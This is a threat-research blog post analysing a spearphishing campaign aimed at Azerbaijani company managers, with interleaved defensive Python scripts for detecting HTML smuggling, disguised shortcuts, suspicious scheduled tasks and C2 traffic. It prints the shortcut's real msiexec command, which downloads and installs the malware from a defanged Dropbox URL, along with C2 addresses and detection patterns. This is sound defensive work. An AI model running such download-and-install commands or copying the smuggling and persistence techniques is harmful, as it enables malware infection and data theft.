Threat Actors Exploit the Tensions Between Azerbaijan and Armenia | FortiGuard Labs

A Short History Lesson

In 1923, the Soviet Union created the Nagorno-Karabakh Autonomous Oblast (an oblast is an administrative region or province) within the Azerbaijan Soviet Socialist Republic. This oblast has a 95% ethnically Armenian population. In 1988, Nagorno-Karabakh declared its intention to leave Azerbaijan and join the neighboring Republic of Armenia. While the Soviet Union was able to keep the resulting tension under control, once the USSR began to collapse, armed conflict between Azerbaijan and Armenia began for control of the Nagorno-Karabakh region. While a ceasefire was tentatively reached in 1994 and again in 2020, tensions remain high between the two countries.

Figure 1. Regional Map

Affected platforms: Microsoft Windows
Impacted parties: Targeted management associated with an Azerbaijani company
Impact: Reconnaissance of basic computer info of targeted users
Severity level: Low

A Spearphishing Campaign Exploits the Azerbaijan-Armenia Conflict

In August 2023, FortiGuard Labs discovered an infected memo pretending to come from the current president of a company in Azerbaijan and aimed at the management teams of associated businesses. Opening this memo downloads malware designed to gather basic information from its targets.

Figure 2. Memo

This blog analyzes the attack chain, reviews the malware’s capabilities, and reveals the possible location of the threat actor behind it.

Anatomy of an Attack

FortiGuard Labs spotted this attack by finding the memo in Figure 2. The memo claims to have information about a border clash between soldiers from Azerbaijan and Armenia.

Figure 3. Attack flow

The memo is in HTML format and uses HTML smuggling to automatically deliver a password-protected archive. This archive, as the memo suggests, contains several images. As shown in the attack diagram in Figure 3, the archive contains three clean images and one phony image. The actual contents are illustrated below.
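HTML smuggling works by shipping the payload inside the page as an encoded literal and letting a few lines of JavaScript rebuild it in the browser and force a download. As an added example (not FortiGuard code, and not the memo from this campaign), the following script statically triages an HTML attachment for those building blocks and identifies the file type of any embedded blob from its magic bytes. The sample HTML, the indicator names and the 64-character payload threshold are constructed for this example.

```python
"""Static triage of an HTML attachment for HTML-smuggling indicators.

Added example (not FortiGuard code). It flags the JavaScript building blocks
HTML smuggling relies on (base64 decode, Blob construction, a forced download)
and identifies the embedded file type from the magic bytes of any large base64
literal. The sample HTML below is constructed; it is not the campaign memo.
"""
import base64
import binascii
import re
from dataclasses import dataclass, field

# JavaScript constructs commonly combined to rebuild a file inside the browser
INDICATOR_PATTERNS = {
    "base64_decode": re.compile(r"\batob\s*\(", re.I),
    "blob_constructor": re.compile(r"\bnew\s+Blob\s*\(", re.I),
    "object_url": re.compile(r"URL\.createObjectURL\s*\(", re.I),
    "forced_download": re.compile(r"\.download\s*=|\bmsSaveOrOpenBlob\s*\(", re.I),
    "auto_click": re.compile(r"\.click\s*\(\s*\)", re.I),
}

# File-type magic bytes worth recognising in a smuggled payload
MAGIC = {
    b"PK\x03\x04": "zip archive",
    b"Rar!\x1a\x07": "rar archive",
    b"MZ": "windows executable",
    b"%PDF": "pdf document",
}

# Base64 literals at least this long are treated as possible payloads (assumed threshold)
MIN_PAYLOAD_CHARS = 64
B64_LITERAL = re.compile(r"[\"']([A-Za-z0-9+/]{%d,}={0,2})[\"']" % MIN_PAYLOAD_CHARS)


@dataclass
class Verdict:
    indicators: list = field(default_factory=list)
    payloads: list = field(default_factory=list)  # (size_bytes, file_type)

    @property
    def suspicious(self) -> bool:
        # Decode + Blob + forced download together are the smuggling signature;
        # an embedded archive or executable is enough on its own.
        core = {"base64_decode", "blob_constructor", "forced_download"}
        return core.issubset(self.indicators) or any(
            kind != "unknown" for _, kind in self.payloads
        )


def identify(data: bytes) -> str:
    """Name the file type of a decoded blob from its leading bytes."""
    for magic, name in MAGIC.items():
        if data.startswith(magic):
            return name
    return "unknown"


def scan_html(html: str) -> Verdict:
    """Collect smuggling indicators and decoded payload sizes/types for one page."""
    verdict = Verdict()
    for name, pattern in INDICATOR_PATTERNS.items():
        if pattern.search(html):
            verdict.indicators.append(name)
    for match in B64_LITERAL.finditer(html):
        try:
            data = base64.b64decode(match.group(1), validate=True)
        except (binascii.Error, ValueError):
            continue  # long string but not valid base64, ignore it
        verdict.payloads.append((len(data), identify(data)))
    return verdict


# Constructed sample: a page that rebuilds a (dummy) zip in the browser.
# The blob is a zip local-file header plus filler, not a real archive.
_FAKE_ZIP = b"PK\x03\x04" + b"\x00" * 60
SAMPLE_HTML = f"""<html><body><p>Loading images...</p><script>
var b64 = "{base64.b64encode(_FAKE_ZIP).decode()}";
var bytes = Uint8Array.from(atob(b64), c => c.charCodeAt(0));
var blob = new Blob([bytes], {{type: "application/octet-stream"}});
var a = document.createElement("a");
a.href = URL.createObjectURL(blob);
a.download = "images.zip";
document.body.appendChild(a); a.click();
</script></body></html>"""

BENIGN_HTML = "<html><body><h1>Memo</h1><p>Nothing here.</p></body></html>"

if __name__ == "__main__":
    for label, doc in (("sample", SAMPLE_HTML), ("benign", BENIGN_HTML)):
        v = scan_html(doc)
        print(f"{label}: suspicious={v.suspicious} indicators={v.indicators} payloads={v.payloads}")
```

The check is deliberately conservative: a page that only calls atob() is not flagged, but one that decodes, wraps the result in a Blob and triggers a download is, and any decoded literal that starts with an archive or executable header is flagged regardless of the script around it. A password-protected archive still carries the ZIP header in the clear, so the magic check works for the kind of payload described above.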

Figure 4. Contents of the zip archive with parts obfuscated for PII purposes

An astute observer may notice that the first “image” is not an image file. In reality, it is a .LNK shortcut that executes the following command:

….\Windows\System32\msiexec.exe /i "https://dl[.]dropboxusercontent[.]com/scl/fi/zjxgh8ofdmfca8bpfntw9/karabakh.jpg.msi?rlkey=nidpjpx3ioigoq6qonibztwg4&dl=0"

This command downloads an .MSI (Microsoft Installer) file. As Figure 3 shows, the installer performs two actions when run. The first is to display an image with the same filename as the phony image shortcut (shown in the zip archive in Figure 4):

Figure 5. The phony image shown when the .LNK shortcut is executed

This misdirection may convince some users that the shortcut was simply an image file, while the installer simultaneously loads hidden malware onto the targeted computer.
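Two things in the archive and the shortcut above are cheap to check mechanically: a member whose name ends in an image extension followed by a shortcut extension (and whose bytes are a shell link rather than a JPEG), and an msiexec invocation whose package source is a URL rather than a local file. The following script is an added example, not FortiGuard code. The archive is built in memory with minimal stand-in contents (a JPEG header, a shell-link header), the member names other than 1.KARABAKH.jpg.lnk are constructed, and the URL in the sample command line is a placeholder.

```python
"""Triage an archive whose members pose as images, and check the kind of
msiexec command such a shortcut launches.

Added example, not FortiGuard code. The archive is built in memory for this
example: its members are minimal stand-ins (a JPEG magic header, a Windows
shortcut header), not the real campaign files, and the URL in the sample
command line is a placeholder.
"""
import io
import re
import zipfile

IMAGE_EXT = {"jpg", "jpeg", "png", "gif", "bmp"}
RISKY_EXT = {"lnk", "exe", "msi", "scr", "js", "vbs", "hta"}
# Magic bytes expected for a member that claims to be an image
IMAGE_MAGIC = {"jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff", "png": b"\x89PNG"}
# Shell link header: HeaderSize 0x4C followed by the LNK CLSID
LNK_SIGNATURE = (
    b"\x4c\x00\x00\x00"
    b"\x01\x14\x02\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46"
)
# msiexec with an install switch whose package source is an http(s) URL
REMOTE_MSI = re.compile(
    r"msiexec(?:\.exe)?\b.*?[/-](?:i|package|a)\s+[\"']?https?://", re.I
)


def member_findings(name: str, head: bytes) -> list:
    """Reasons a member looks suspicious, judged by its name and first bytes."""
    findings = []
    parts = name.lower().split(".")
    ext = parts[-1] if len(parts) > 1 else ""
    inner = parts[-2] if len(parts) > 2 else ""
    if inner in IMAGE_EXT and ext in RISKY_EXT:
        findings.append(f"double extension: image name ending in .{ext}")
    if head.startswith(LNK_SIGNATURE):
        findings.append("content is a Windows shortcut (.lnk)")
    expected = IMAGE_MAGIC.get(ext)
    if expected and not head.startswith(expected):
        findings.append(f"content does not match .{ext} image format")
    return findings


def triage_archive(zip_bytes: bytes, password: bytes = None) -> dict:
    """Map each suspicious member name to its findings.
    `password` is only needed for archives using classic ZIP encryption."""
    report = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            with zf.open(info, pwd=password) as fh:
                head = fh.read(32)  # enough for every magic value above
            findings = member_findings(info.filename, head)
            if findings:
                report[info.filename] = findings
    return report


def is_remote_msiexec(cmdline: str) -> bool:
    """True when msiexec is asked to install a package straight from a URL."""
    return bool(REMOTE_MSI.search(cmdline))


def build_sample_archive() -> bytes:
    """Constructed archive: one shortcut dressed as an image, three JPEG-like members."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("1.KARABAKH.jpg.lnk", LNK_SIGNATURE + b"\x00" * 40)
        for n in ("2.jpg", "3.jpg", "4.jpg"):
            zf.writestr(n, IMAGE_MAGIC["jpg"] + b"\xe0" + b"\x00" * 32)
    return buf.getvalue()


# Constructed command line mirroring the shape of the shortcut's msiexec call
SAMPLE_CMD = r'..\..\Windows\System32\msiexec.exe /i "https://example.invalid/karabakh.jpg.msi?dl=0"'

if __name__ == "__main__":
    for member, why in triage_archive(build_sample_archive()).items():
        print(member, "->", "; ".join(why))
    print("remote msiexec:", is_remote_msiexec(SAMPLE_CMD))
```

The byte-level check matters because Explorer hides the .lnk extension by default, so the name test alone would miss a shortcut renamed to a plain image name; the msiexec test is a reasonable process-creation alert since legitimate installs from an http(s) package source are rare on managed endpoints.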

Malware

The malicious installer creates a new folder in the user’s %APPDATA% folder called “Windows Defender Health Check.” It also installs malware with the same name:

C:\Users\[username]\AppData\Roaming\Windows Defender Health Check\WindowsDefenderHealthcheck.exe

Uncommon Traits

This malware is programmed in Rust, which is not the language of choice for most malware authors, and that makes standard analysis tools and methods somewhat less effective. The use of Rust alone sets this threat actor apart, but it is not the only trait that makes this malware distinct.

For persistence, a temporary file is created called “24rp.xml.” This file is used to create a scheduled task.

Figure 6. Scheduled task

Once the scheduled task is created, the .XML file is deleted. This technique assumes that the intended targets leave their computers on overnight so the malware can execute outside regular office hours when it is less likely to be noticed. Moreover, for even greater stealth, the malware can sleep for random amounts of time when performing its tasks.
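The persistence traits described above (an executable dropped in the user's roaming profile under a security-product-sounding name, registered through a task definition that fires overnight) can be reviewed directly from a Task Scheduler XML export. The script below is an added example, not FortiGuard code; the two task definitions are constructed and are not the contents of 24rp.xml, and the 08:00-18:00 office window, the user-writable folder list and the lookalike keywords are assumptions to tune per environment.

```python
"""Review a Task Scheduler XML definition for the traits described above:
an executable placed in a user-writable folder under a security-product
name, and a trigger that fires outside office hours.

Added example, not FortiGuard code. The two task definitions below are
constructed and are not the contents of 24rp.xml (Figure 6 is not
reproduced here). The 08:00-18:00 office window, the user-writable folder
list and the lookalike keywords are assumptions to tune per environment.
"""
import re
import xml.etree.ElementTree as ET
from datetime import datetime, time

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
OFFICE_START, OFFICE_END = time(8, 0), time(18, 0)  # assumed office window
USER_WRITABLE = re.compile(r"\\(?:AppData|Temp|ProgramData|Users\\Public)\\", re.I)
LOOKALIKE = re.compile(r"defender|antivirus|security", re.I)
TRUSTED_ROOT = re.compile(r"^[A-Z]:\\(?:Windows|Program Files(?: \(x86\))?)\\", re.I)


def review_task(xml_text: str) -> list:
    """Return human-readable findings for one task definition."""
    root = ET.fromstring(xml_text)
    findings = []
    for cmd in root.findall(".//t:Exec/t:Command", NS):
        path = (cmd.text or "").strip().strip('"')
        if USER_WRITABLE.search(path):
            findings.append(f"command runs from a user-writable path: {path}")
        if LOOKALIKE.search(path) and not TRUSTED_ROOT.match(path):
            findings.append("security-product-like name outside a trusted install root")
    for boundary in root.findall(".//t:StartBoundary", NS):
        try:
            when = datetime.fromisoformat((boundary.text or "").strip())
        except ValueError:
            continue  # malformed or missing timestamp, nothing to judge
        if not OFFICE_START <= when.time() < OFFICE_END:
            findings.append(f"trigger starts outside office hours: {when.time()}")
    return findings


# Constructed task: binary in %APPDATA% under a Defender-like name, fires at 23:30
SUSPICIOUS_TASK = r"""<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <CalendarTrigger>
      <StartBoundary>2023-08-08T23:30:00</StartBoundary>
      <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay>
    </CalendarTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Users\victim\AppData\Roaming\Windows Defender Health Check\WindowsDefenderHealthcheck.exe</Command>
    </Exec>
  </Actions>
</Task>"""

# Constructed task: a system utility from the Windows folder, fires at noon
BENIGN_TASK = r"""<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <CalendarTrigger>
      <StartBoundary>2023-08-08T12:00:00</StartBoundary>
      <ScheduleByWeek><WeeksInterval>1</WeeksInterval></ScheduleByWeek>
    </CalendarTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Windows\System32\cleanmgr.exe</Command>
      <Arguments>/sagerun:1</Arguments>
    </Exec>
  </Actions>
</Task>"""

if __name__ == "__main__":
    for label, xml_text in (("suspicious", SUSPICIOUS_TASK), ("benign", BENIGN_TASK)):
        print(label, review_task(xml_text) or ["no findings"])
```

Because the malware deletes its XML file after registering the task, the definition has to be pulled from the live scheduler (for example with an export of the registered task) rather than from disk; the review logic is the same either way.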

Figure 7. Sleep between 10 and 20 minutes

Next, we will refer back to Figure 2 for another indication of how this malware attempts to stay hidden. Notice the memo is dated August 8th. By examining its compile timestamp, we found that this malware was created the previous day.

Figure 8. Creation time of the malware

This short window makes it very unlikely that the malware was exposed before the attack began.

Stealing Information

Ultimately, the malware acts like an infostealer, gathering basic computer information and sending it to a C2 server. The following commands are executed:

Figure 9. Commands executed by the malware

These commands suggest that the threat actor is still in the early stages of attempting to fully compromise its targets. The information being gathered from these commands could be used to tailor specific attacks for each infected target.

This infostealer is unique because it also collects a list of environment variables and takes an extra step to check for any proxy servers in use.

Figure 10. Checking for proxy

If a proxy server is configured, the malware routes its traffic through it. It then issues a POST request to send the encrypted stolen information to a C2 server owned by the threat actor, 78[.]135.73.140, on port 35667.
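Because the malware honours the system proxy, its POST to the C2 server will appear in proxy or egress firewall logs, which makes the network indicators at the end of this post directly sweepable. The following script is an added example, not FortiGuard code: it refangs the IPs listed under Network IOCs, matches them against outbound connection records, and treats the rest of the same /24 as lower-confidence. The key=value log format and the log lines themselves are constructed for the example; adapt the parser to your own proxy or firewall export.

```python
"""Sweep outbound connection records for the network indicators in this post.

Added example, not FortiGuard code. The log lines are constructed in a
key=value format for this example; adapt parse_line() to your proxy or
firewall export. The defanged indicators are those listed under Network IOCs.
"""
import ipaddress
import re

DEFANGED_IOCS = [
    "78[.]135.73.140",
    "78[.]135.73.147",
    "78[.]135.73.162",
    "78[.]135.73.183",
    "78[.]135.73.188",
]
C2_PORT = 35667  # port used for the POST to 78[.]135.73.140


def refang(indicator: str) -> str:
    """Turn a defanged IP such as 78[.]135.73.140 back into a usable address."""
    return indicator.replace("[.]", ".").replace("(.)", ".")


IOC_IPS = {ipaddress.ip_address(refang(i)) for i in DEFANGED_IOCS}
# Every indicator sits in one /24; the rest of that block is lower confidence.
IOC_NETS = {ipaddress.ip_network(f"{ip}/24", strict=False) for ip in IOC_IPS}

KV = re.compile(r"(\w+)=(\S+)")


def parse_line(line: str) -> dict:
    """Parse one constructed key=value record into a dict."""
    return dict(KV.findall(line))


def classify(event: dict):
    """Return a verdict string for one event, or None if it is not of interest."""
    try:
        dst = ipaddress.ip_address(event.get("dst", ""))
    except ValueError:
        return None  # no usable destination address
    port = int(event.get("dport", 0))
    if dst in IOC_IPS:
        if port == C2_PORT and event.get("method", "").upper() == "POST":
            return "high: POST to known C2 on its reporting port"
        return "high: connection to listed C2 infrastructure"
    if any(dst in net for net in IOC_NETS):
        return "medium: traffic to the C2's /24 neighbourhood"
    return None


def sweep(lines):
    """Return (ts, src, dst, verdict) for every record that matches."""
    hits = []
    for line in lines:
        ev = parse_line(line)
        verdict = classify(ev)
        if verdict:
            hits.append((ev.get("ts"), ev.get("src"), ev.get("dst"), verdict))
    return hits


# Constructed records; 203.0.113.10 is a documentation address, not a real host
SAMPLE_LOG = [
    "ts=2023-08-09T02:14:07Z src=10.0.0.15 dst=78.135.73.140 dport=35667 method=POST bytes_out=2048",
    "ts=2023-08-09T02:14:09Z src=10.0.0.15 dst=203.0.113.10 dport=443 method=GET bytes_out=512",
    "ts=2023-08-09T03:01:40Z src=10.0.0.22 dst=78.135.73.99 dport=1194 method=- bytes_out=90",
    "ts=2023-08-09T08:30:00Z src=10.0.0.31 dst=78.135.73.188 dport=443 method=GET bytes_out=77",
]

if __name__ == "__main__":
    for hit in sweep(SAMPLE_LOG):
        print(*hit)
```

The /24 tier is there because the infrastructure discussion later in this post found additional servers in that block; keep it as a review queue rather than a blocking rule, since the block may also host unrelated tenants.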

Tracking a Possible Threat Actor

Our telemetry found nothing especially interesting about the C2 server itself, but digging further uncovered additional information. Passive DNS (PDNS) and other records indicate that the C2 server 78[.]135.73.140 is not a shared server, which suggests the threat actor has full control over its setup. Working from this assumption, we searched for more of the threat actor's network infrastructure. In the /24 subnet alone, four additional servers were revealed:

Figure 11. Partial network infrastructure

Using the August 8th date on the memo as a starting point, we searched for traffic to these servers during the preceding month. While we did not find significant amounts of traffic, we identified one IP address in Colombia that, in July, connected to the server 78[.]135.73.188 for a substantial amount of time on a port commonly used for VPNs. If the threat actor wanted to hide their activity, a VPN server under their control would accomplish that. The Colombian IP address belongs to a cellular carrier, which suggests the user may have been on a mobile hotspot. If so, this may be the attacker's location.

Conclusion

The threat actor in this campaign uses a few advanced techniques, including Rust and after-hours execution, to help it stay under the radar and make analysis more difficult. The size of the network infrastructure also suggests this threat actor is not a run-of-the-mill malware developer but someone with access to resources. And the use of a geopolitical ruse indicates that this threat actor is plugged in and knows how to target specific users.

Fortinet Protections

Fortinet customers are already protected from these malware samples through AntiVirus and FortiEDR services, as follows:

FortiGuard Labs detects the relevant samples with the following AV signatures:

  • W64/Agent.EO!tr.pws
  • LNK/Agent.360A!tr

The URLs are rated as “Malicious Websites” by the FortiGuard Web Filtering service.

The FortiGuard AntiVirus service is supported by FortiGate, FortiMail, FortiClient, and FortiEDR. Fortinet EPP customers running current AntiVirus updates are also protected.

If you believe this or any other cybersecurity threat has impacted your organization, please contact our Global FortiGuard Incident Response Team.

File IOCs

2A71BA3FEF819AB9FF3347CF71EEA37766B1E80FDBC1B53C83DD3B19CE71EBFD

ARMENIAN_ACT_OF_AGGRESSION.pdf.html

17B3ACB560E979556207B8E7E41A086F6F147381E2FFD1CE672D663A526B1FB5

Armenian Aggression.zip

04725FB5A9E878D68E03176364F3B1057A5C54CCA06EC988013A508D6BB29B42

1.KARABAKH.jpg.lnk

35F2F7CD7945F43D9692B6EA39D82C4FC9B86709B18164AD295CE66AC20FD8E5

karabakh.jpg.msi

5327308FEE51FC6BB95996C4185C4CFCBAC580B747D79363C7CF66505F3FF6DB

WindowsDefenderHealthcheck.exe

Network IOCs

https://dl[.]dropboxusercontent[.]com/scl/fi/zjxgh8ofdmfca8bpfntw9/karabakh.jpg.msi?rlkey=nidpjpx3ioigoq6qonibztwg4&dl=0

78[.]135.73.140

78[.]135.73.147

78[.]135.73.162

78[.]135.73.183

78[.]135.73.188


Source: https://www.fortinet.com/blog/threat-research/threat-Actors-exploit-the-tensions-between-azerbaijan-and-armenia